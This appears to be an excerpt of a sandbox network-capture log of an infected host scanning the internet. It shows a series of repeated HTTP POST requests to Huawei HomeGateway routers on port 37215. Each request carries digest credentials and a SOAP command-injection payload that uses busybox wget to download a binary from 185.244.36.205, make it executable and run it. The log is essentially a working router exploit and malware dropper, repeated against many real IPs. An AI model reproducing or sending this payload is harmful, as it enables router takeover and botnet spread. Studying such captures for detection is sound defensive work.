                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2056192.168.2.1543802138.196.23.5837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103307009 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2057192.168.2.1555340190.105.77.19237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103310108 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2058192.168.2.1547966122.121.211.18537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103318930 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2059192.168.2.153525094.24.93.437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103331089 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2060192.168.2.1548238222.104.193.9737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103432894 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2061192.168.2.155689641.23.84.6837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103444099 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2062192.168.2.1545866190.244.103.13637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103511095 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2063192.168.2.154507631.236.67.19437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103514910 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2064192.168.2.155349245.115.234.18437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103514910 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2065192.168.2.154343641.233.240.10637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103564978 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2066192.168.2.154384095.106.54.8137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103566885 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
